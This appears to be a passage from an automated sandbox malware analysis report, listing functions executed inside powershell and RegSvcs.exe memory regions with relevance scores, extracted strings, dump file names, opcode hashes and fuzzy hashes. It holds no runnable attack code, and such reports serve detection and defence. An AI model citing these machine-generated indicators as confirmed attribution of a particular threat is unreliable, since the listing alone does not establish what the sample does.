Instruction ID: 6a44c2b9dd0855db33bbe6f8e9f48c9ea26f46cd69a7bc1d618514407fd47232
Opcode Fuzzy Hash: 6b3fa31d2c575c3bdf6de30c50f69e8f2a252abef286fa7526dbff3de8282735
Instruction Fuzzy Hash: 0D42D63091DA898FEB95EB28C4516B87BE1EF45390F4501BBD04ECB2D2DF2DA806C754

Function 00007FF848F35180 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149224008.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31f511bbd7103e32757ae6b37b03de3d7a4f548f2c021cc9f85dafc97abd7c3b
Instruction ID: d773e117bcedc63984d2fcf7891f19890e6234f24e84b995b2045a7330de3408
Opcode Fuzzy Hash: 31f511bbd7103e32757ae6b37b03de3d7a4f548f2c021cc9f85dafc97abd7c3b
Instruction Fuzzy Hash: 31216D3191DB990FE31CAE744C9A432BB95EB97250B06417FC587C71E3DD18680747C1

Analysis Process: RegSvcs.exePID: 5796, Parent PID: 4088COMMON

Executed Functions

Function 06730007 Relevance: 5.3, Strings: 3, Instructions: 1519COMMON

Download Yara Rule

Strings

fhq, xrefs: 067300C8
4'cq, xrefs: 0673195B
fhq, xrefs: 06730EF5

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID: fhq$ fhq$4'cq
API String ID: 0-369559571
Opcode ID: bcaadc9e22f02cbcde83d8e56dfc5aa382f16561c33987d910a45e41bb794fb2
Instruction ID: c6f798dbd4ea495804c4f0faff624bef0621345f184ec553d2e677bbc140b3cb
Opcode Fuzzy Hash: bcaadc9e22f02cbcde83d8e56dfc5aa382f16561c33987d910a45e41bb794fb2
Instruction Fuzzy Hash: 4AF2FA34710105CFC745EF24DAA9E6B77F2BB8C708F9147A9D40A9BB68DA356D42CB80

Function 06730040 Relevance: 5.3, Strings: 3, Instructions: 1507COMMON

Download Yara Rule

Strings

fhq, xrefs: 067300C8
4'cq, xrefs: 0673195B
fhq, xrefs: 06730EF5

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID: fhq$ fhq$4'cq
API String ID: 0-369559571
Opcode ID: 5c609e06e3e1e5765d6e9976d9db2951a603f0ae3d7c89acba906be793e28136
Instruction ID: cb8559673efebea64dc39f7605e54d613ff663fe5457c2988964ac779a6e5f38
Opcode Fuzzy Hash: 5c609e06e3e1e5765d6e9976d9db2951a603f0ae3d7c89acba906be793e28136
Instruction Fuzzy Hash: DCF2FA34710105CFC745EF24DAA9E6B77F2BB8C708F9147A9D40A9BB68DA356D42CB80

Function 0673237F Relevance: 1.6, Strings: 1, Instructions: 305COMMON

Download Yara Rule

Strings

Ep, xrefs: 0673282E

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID: Ep
API String ID: 0-2664974837
Opcode ID: ec34fa4df4ec85c11442377142ee8f2e45a8cd13ff9e5ee3a9a4f361dc2c856c
Instruction ID: 2efca466b70cb3219bcdc40a686f0e00a50e3017e6092ca32d0c821d95252c4b
Opcode Fuzzy Hash: ec34fa4df4ec85c11442377142ee8f2e45a8cd13ff9e5ee3a9a4f361dc2c856c
Instruction Fuzzy Hash: 91D13034B00115CFC745EF28D6A9A6B77F2BB88304F5186A9D80A9B799DF349D42CF81

Function 06732388 Relevance: 1.5, Strings: 1, Instructions: 291COMMON

Download Yara Rule

Strings

Ep, xrefs: 0673282E

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID: Ep
API String ID: 0-2664974837
Opcode ID: 34d9c9096810df19b77ad2147ebd40fd04d44b5ba2f203ef6b9da6e09cd22610
Instruction ID: c4b41d98ece43927843a406290f529945e36519454155b8aea10a43d2d639d4c
Opcode Fuzzy Hash: 34d9c9096810df19b77ad2147ebd40fd04d44b5ba2f203ef6b9da6e09cd22610
Instruction Fuzzy Hash: F9C12034B00115CFC745EF28D6A9A6B77F2BB88304F5146A9D8099B799DF349D42CF80

Function 06732454 Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

Ep, xrefs: 0673282E

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID: Ep
API String ID: 0-2664974837
Opcode ID: 832c00ddc18cd94b906e74489cbc0fb01ae3489816daa906af63f6416faa2ae4
Instruction ID: a331654949f3247f51cf5a19351d1785ca9d3bd92ab0899e59586cc0d18e0bc6
Opcode Fuzzy Hash: 832c00ddc18cd94b906e74489cbc0fb01ae3489816daa906af63f6416faa2ae4
Instruction Fuzzy Hash: DEA12134B00115CFD749EF24D669A6B77F2FB88304F5146A9D80A9B799DF349D42CB80

Function 067328F0 Relevance: 5.5, Strings: 4, Instructions: 482COMMON

Download Yara Rule

Strings

gq, xrefs: 06732E90
PHcq, xrefs: 06732D82
Hiq, xrefs: 06732AA4
PHcq, xrefs: 06732D94

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID: Hiq$PHcq$PHcq$gq
API String ID: 0-3740266905
Opcode ID: 5a97dfcf2f8b015a32c2a5384c92f6eab9eee4ffd5e994cbd799ec0b973ee800
Instruction ID: 42cdddc140a41f0c1b12c9232b2af20b00f76355ab0f5a4815e3d6de508100c3
Opcode Fuzzy Hash: 5a97dfcf2f8b015a32c2a5384c92f6eab9eee4ffd5e994cbd799ec0b973ee800
Instruction Fuzzy Hash: E8125F30A007168FCB65DF79C554A6EB7B2FF88310F248A69D4169B7A6DB34E941CB80

Function 06733298 Relevance: 4.0, Strings: 3, Instructions: 251COMMON

Download Yara Rule

Strings

|>jq, xrefs: 06733439
|>jq, xrefs: 06733421
4'cq, xrefs: 06733451

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID: 4'cq$|>jq$|>jq
API String ID: 0-1631538968
Opcode ID: 4de37845c24256d44ac99b1688d4cc1a8378dc0fd2b5775dae075660195b43f6
Instruction ID: 60f30b5c0f841d9399ceff911f4f05cd0b46286241a650b1ae74fae2794ba655
Opcode Fuzzy Hash: 4de37845c24256d44ac99b1688d4cc1a8378dc0fd2b5775dae075660195b43f6
Instruction Fuzzy Hash: ED31D6702003805FC362EF29DC44A6A7BE6AF85314B29CA5DF4858F2E3DB35ED468791

Function 010509C9 Relevance: 3.9, Strings: 3, Instructions: 101COMMON

Download Yara Rule

Strings

Tecq, xrefs: 01050A98
Tecq, xrefs: 01050A5F
p0@, xrefs: 01050A8C

Memory Dump Source

Source File: 00000003.00000002.4556810259.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_RegSvcs.jbxd

Similarity

API ID:
String ID: Tecq$Tecq$p0@
API String ID: 0-3911041250
Opcode ID: 3410a7f627c56798729233b2893bc26dbdf12c4af9a06182f892a2518b65f6b9
Instruction ID: 3eb3ba72ddf58ac12f83f39dfc5413da3a409715ed3973eac6f1363223db1798
Opcode Fuzzy Hash: 3410a7f627c56798729233b2893bc26dbdf12c4af9a06182f892a2518b65f6b9
Instruction Fuzzy Hash: AD412C74B101048FC744DF69D598A9EBBF2BF8D310F2544A9E906EB3A5CA719D01CF51

Function 067328E0 Relevance: 2.8, Strings: 2, Instructions: 349COMMON

Download Yara Rule

Strings

PHcq, xrefs: 06732D82
Hiq, xrefs: 06732AA4

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID: Hiq$PHcq
API String ID: 0-2831662039
Opcode ID: b2c6231943ffbdac9b10c5dc22b80240250a0601102987deab642479dc1c6608
Instruction ID: 237d6cc11e42615a1a50e321d0fbb4b960647815f764d2b45d5dee7e8c8de51f
Opcode Fuzzy Hash: b2c6231943ffbdac9b10c5dc22b80240250a0601102987deab642479dc1c6608
Instruction Fuzzy Hash: D2D18170A00716CFD765DF79C844B6AB7F2FF84304F248A29E4159B696DB74E981CB80

Function 067369C8 Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

(gq, xrefs: 06736AEB

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID: (gq
API String ID: 0-1972435379
Opcode ID: a7e8aae298efe08d725cd261960e427a50d642f7354ebb7631fb589e89fb6c11
Instruction ID: 31c8f4dc5970754bd945be7aee206290563bb7c5ad734b9e65bcae148f222aa2
Opcode Fuzzy Hash: a7e8aae298efe08d725cd261960e427a50d642f7354ebb7631fb589e89fb6c11
Instruction Fuzzy Hash: 00918074B00119DFCB44EF68C568AAEB7F2FF8C304B5186A9D40A9B765DA35AD01CB81

Function 067343F7 Relevance: 1.4, Strings: 1, Instructions: 131COMMON

Download Yara Rule

Strings

l^_], xrefs: 06734434

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID: l^_]
API String ID: 0-510654671
Opcode ID: 9589dd977ed9f5e70bfb88b2f160714a7c2b2d631bf59d8030a0970cfdf9408d
Instruction ID: f59ce0fc571b6b77e4c7205da015bb07bbe801e6fc276aca61cfe03b3c772bf1
Opcode Fuzzy Hash: 9589dd977ed9f5e70bfb88b2f160714a7c2b2d631bf59d8030a0970cfdf9408d
Instruction Fuzzy Hash: 884104307002498FC705EF68C8949AEBBF2FF85304B14C56AE5498B356DB31AD06CB91

Function 06738770 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

acq, xrefs: 067388A0

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID: acq
API String ID: 0-2712774907
Opcode ID: 067f7c3046a2a78adaf808baaa8797dd23ab95b664548cb90d95f97850f08367
Instruction ID: edd7ae4b9de7a070901641b68b542128bcfc7f017d939df4ab0170766e6ab921
Opcode Fuzzy Hash: 067f7c3046a2a78adaf808baaa8797dd23ab95b664548cb90d95f97850f08367
Instruction Fuzzy Hash: 3F4147706093908FC746DBB889455AA7FB2EFC3314B4981DEE485DB293DA345D07C792

Function 0673268A Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

Ep, xrefs: 0673282E

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID: Ep
API String ID: 0-2664974837
Opcode ID: 475e4ed232e1f75845c67dd6acae5bf4c9529854b253d66d4d4ced8c41902835
Instruction ID: 28277059df2225b038628df38276a8d553bc4f934d90df4104e842fbcebaf044
Opcode Fuzzy Hash: 475e4ed232e1f75845c67dd6acae5bf4c9529854b253d66d4d4ced8c41902835
Instruction Fuzzy Hash: 83514C34B00115CFC755EF28DAA9AAA77F2FB88304F5086A9E4099B759DB349D42CF80

Function 06732697 Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

Ep, xrefs: 0673282E

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID: Ep
API String ID: 0-2664974837
Opcode ID: 2309ad7bed0a75f7201b2cb703e993c2f55e2724faf1a2658c983f0d7d1ac9dd
Instruction ID: 4864024deb5a927a5ef63b23c005fdad53abdfde9a2a604815f39725383283e5
Opcode Fuzzy Hash: 2309ad7bed0a75f7201b2cb703e993c2f55e2724faf1a2658c983f0d7d1ac9dd
Instruction Fuzzy Hash: 5C513D34B00115CFC755EF28DAA9AAB77F2FB88304F5046A9E4099B759DB349D42CF80

Function 06738600 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

Tecq, xrefs: 0673864B

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID: Tecq
API String ID: 0-1122318316
Opcode ID: 476d5c0dcfccdbfa8cfbb482e4efd4a623dbfc5a649c68c31e36f2c1291ee276
Instruction ID: 949b9a68dc1e47d4ae201d1f708c64d7f4a3da9cb1a58a0d9d2b13be64372d72
Opcode Fuzzy Hash: 476d5c0dcfccdbfa8cfbb482e4efd4a623dbfc5a649c68c31e36f2c1291ee276
Instruction Fuzzy Hash: 772136707042448BCB45EBB4C968AEEBFB2AB8A314F14815AE4019B397DA755C06D7A2

Function 06735CF0 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

Tecq, xrefs: 06735D1A

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID: Tecq
API String ID: 0-1122318316
Opcode ID: e1a2aae70a5eeb1a840db017147496ad531ec1dca809b0eb36cb869652e78bd2
Instruction ID: 49f74afff4a71749cc5506bbfc45b9b6666730e96ca65f31a83b56100841d880
Opcode Fuzzy Hash: e1a2aae70a5eeb1a840db017147496ad531ec1dca809b0eb36cb869652e78bd2
Instruction Fuzzy Hash: BE11E3717101259BEB09EAA4C95A7FF37B3ABC8700F210629D801AB7C5CE740D02C7D5

Function 06738800 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

acq, xrefs: 067388A0

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID: acq
API String ID: 0-2712774907
Opcode ID: a6964de7a0a7e3b853f8a6b83c39ac1db918a8f55b275374b2607ffec714afc9
Instruction ID: 96869d2b70fdb75d70358b5bea228dd8a914c29adb23564ee02f04ef93642cb2
Opcode Fuzzy Hash: a6964de7a0a7e3b853f8a6b83c39ac1db918a8f55b275374b2607ffec714afc9
Instruction Fuzzy Hash: A411C470B002248FC754FF6999456AF7BB6EBC4710F508629E90597385DF345E01CBC2

Function 06735D00 Relevance: 1.3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

Tecq, xrefs: 06735D1A

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID: Tecq
API String ID: 0-1122318316
Opcode ID: 38abe91dba3e730c0d24293c6b111483c24b8432fbaeb17c523a34bdf7ef5e31
Instruction ID: c63ec418856c868d1ce9b89b6d37266e47710bb71596009eb655884410e314b5
Opcode Fuzzy Hash: 38abe91dba3e730c0d24293c6b111483c24b8432fbaeb17c523a34bdf7ef5e31
Instruction Fuzzy Hash: 2F01C4307001259BDB05EB58C5597BF77B2ABC8700F600619D401AB7C5CF740D01C7D5

Function 06738847 Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

acq, xrefs: 067388A0

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID: acq
API String ID: 0-2712774907
Opcode ID: f3703d8455e24468002ca0b4602a73194004a379bb5247403ac160238b1489c6
Instruction ID: 211f0d743284fa4771e056eb3d9b8eda737217222d09adba73d193d8de81ee7d
Opcode Fuzzy Hash: f3703d8455e24468002ca0b4602a73194004a379bb5247403ac160238b1489c6
Instruction Fuzzy Hash: CEF0F6703003249BD750FB2898457AE7B62EBC0720F908A19FA025B7C5DF746E45CBC6

Function 06733752 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ce06c76ae9f31c329408cea2b46b124330f39228b52c293ac31de2ea1930a5
Instruction ID: 538fcd01d452676d3db56ec88d050ce47d59e75724015508a0e19d15ad355705
Opcode Fuzzy Hash: 57ce06c76ae9f31c329408cea2b46b124330f39228b52c293ac31de2ea1930a5
Instruction Fuzzy Hash: 2B910A34A00158DFCB64CFA9C994AADBBB2FF88314F248569D405AB366CB35ED42CF50

Function 06734408 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 684b2cfcb48c9b57b19cf3fac29811ed712da11c642aa290c2f87aa5e20d7ec5
Instruction ID: 990e5b7bac104a1582017fdabd0276231b7074a5e9b1b406a12ef521557e332a
Opcode Fuzzy Hash: 684b2cfcb48c9b57b19cf3fac29811ed712da11c642aa290c2f87aa5e20d7ec5
Instruction Fuzzy Hash: 6941EF307002099FC704EF68D8959AEBBF6FF89304B608569E5098B755DF31AD07CB91

Function 067338BA Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44d4c8fc47df808d6e027c5582a232e7de920c9ea772839a4c78ddd93ff8d916
Instruction ID: 82a95d570cf07c38025ac52f1e7b4938e04066b8c73a5f046683983668a94655
Opcode Fuzzy Hash: 44d4c8fc47df808d6e027c5582a232e7de920c9ea772839a4c78ddd93ff8d916
Instruction Fuzzy Hash: E4415C30A00258DFDB64DFA9C594BADBBB2BF88315F24856CD006AB296CB35ED41CF50

Function 010508E0 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4556810259.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16f20b6af0b67999bdafb0ba23d8f5ce9a94e8f2975f3187f68cce286f38c0d2
Instruction ID: 451b49d668493b4eeeb5f3ed81de32128aef3e755aed041684969cd987f36892
Opcode Fuzzy Hash: 16f20b6af0b67999bdafb0ba23d8f5ce9a94e8f2975f3187f68cce286f38c0d2
Instruction Fuzzy Hash: 5F21CF303063405FD7429B39886066A7FF6FF8674071444AAE986CB3A7EA64EC068B91

Function 01050908 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4556810259.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e47224519e83811e83cd1114378bbf12e238ef0d62514e5b4ad6d57d5e301c4
Instruction ID: 91fcc584c27d6fb2a0c2cedc86577ba3513ca133aae85e375de8efe4d9e2016b
Opcode Fuzzy Hash: 8e47224519e83811e83cd1114378bbf12e238ef0d62514e5b4ad6d57d5e301c4
Instruction Fuzzy Hash: B411B2357012004FD740973ED854A6EBBE6FFC47507048469F906CB369EE60DC018790

Function 06736990 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aba25e796880bf2751dedf943afd54360cf120715b85ba96bfd1bfde7a84bf4
Instruction ID: f25f6a647b127ac0b5e3e30bd13ef06b758259e67028fb27269f5abc856ee64c
Opcode Fuzzy Hash: 4aba25e796880bf2751dedf943afd54360cf120715b85ba96bfd1bfde7a84bf4
Instruction Fuzzy Hash: BB21F631D05790AFCB55CFA4C9915EABFB1EF06304B0981DAE489CB253C234A907CF51

Function 06733DF0 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd404f4fd818a108939867d5333500f9e4fa7a4cacf892fb99c5c9426d94cf1f
Instruction ID: c14b391ebbcc17880eb5c5722dc5b983684c1dfb3a34952b0a70ca0e9a0bcd90
Opcode Fuzzy Hash: bd404f4fd818a108939867d5333500f9e4fa7a4cacf892fb99c5c9426d94cf1f
Instruction Fuzzy Hash: 97213530600B118FC324DF19D944A62F7E1EF84324F19CA69E49A8BAA2C774FC85CB80

Function 067391D1 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f289854429d5baf2a8920bfa73b5fc46a350233f1ebb9d26ed3a814658f916e
Instruction ID: 232f72e648799c91acfab78398f4edfcdafb02e01e5c7ebf3e151f234f36ca22
Opcode Fuzzy Hash: 5f289854429d5baf2a8920bfa73b5fc46a350233f1ebb9d26ed3a814658f916e
Instruction Fuzzy Hash: A821ACB0C047498FCB11DFA9C8447DEFFF4EB4A320F24855AC029A7292D3386845CBA2

Function 06733EC0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6826b92b6860753cc5bb4cdbc3bc75be6949a76aaa9d06941f31c8ca7d06145c
Instruction ID: 742a57b3248f9a00957992c3cdf096b34391104ca946e8b985da3be35f99cacf
Opcode Fuzzy Hash: 6826b92b6860753cc5bb4cdbc3bc75be6949a76aaa9d06941f31c8ca7d06145c
Instruction Fuzzy Hash: 50116D707042919FD770DF29D888E52BBF9EB89328B5485A9E44ACB263D731E846CB50

Function 067384C0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c5810b7b3dbc9ca47898ed7614e64c1906959eca2300d380690b9ed1ff1df56
Instruction ID: ba2c74a123b7ea14180ef1067b62afc5f55bf91402291d8f838a69f989634f66
Opcode Fuzzy Hash: 8c5810b7b3dbc9ca47898ed7614e64c1906959eca2300d380690b9ed1ff1df56
Instruction Fuzzy Hash: 95110C3170A7908FD356CB7598506627FB5EFC7210758419AF089CB993C635A80AC761

Function 06732F57 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081843236909beef2915d52e8aeaa6fbe635ea6a14f71bcf6d8d55341def2ba2
Instruction ID: fac2d2435c35dd172f1815da2d49e875c80141bc582c0f7347d0f1d012229952
Opcode Fuzzy Hash: 081843236909beef2915d52e8aeaa6fbe635ea6a14f71bcf6d8d55341def2ba2
Instruction Fuzzy Hash: 6B11C0357042418FC710CF69DC9896AFBF6EF8A36071845AEE589DB362DA35EC02CB50

Function 06732F68 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b8a8b3d5d75362577044859128bc96e85f16abe6b9737477dd3f2baf6a1dc0
Instruction ID: 47048ceb42f6ab3060bb81f1b49812a9863528d6742f3c4070a83afc6a2a0bc5
Opcode Fuzzy Hash: 21b8a8b3d5d75362577044859128bc96e85f16abe6b9737477dd3f2baf6a1dc0
Instruction Fuzzy Hash: B8014B357002059FC710DB6AD88892AB7EAEFCD365B184469FA49DB362DA31EC018B90

Function 00FED809 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4555722631.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fed000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fa5bce7282f5fb155e972750f9410758f5b00576df3b5803e30196dc2145c01
Instruction ID: 4fa89cf339fb85b7db887e7f912c14ab984182b43c7d5d798bf0b73b1c5579b6
Opcode Fuzzy Hash: 3fa5bce7282f5fb155e972750f9410758f5b00576df3b5803e30196dc2145c01
Instruction Fuzzy Hash: 4F01F2718093849AE7109B1BDC8476BBFA8DF41330F28C51AEC094A686C3789940E6B1

Function 06739200 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 094792bef84c93df6ee0f413fef51a4ae15a117ab5e0941d59e887b1324509a9
Instruction ID: a2b0de0afab6fb3ce8068c902ae40b69b16440c2ee33184ae7d7c15addddaf0b
Opcode Fuzzy Hash: 094792bef84c93df6ee0f413fef51a4ae15a117ab5e0941d59e887b1324509a9
Instruction Fuzzy Hash: EF1100B5C007498FCB20DFAAC548B9EFBF4EB48320F20841AD519A7351D375A944CFA6

Function 06738330 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11e9ef5f8faf0f3385a7f1c12874826890cb4aa5a6f08f403f086c63afbb281f
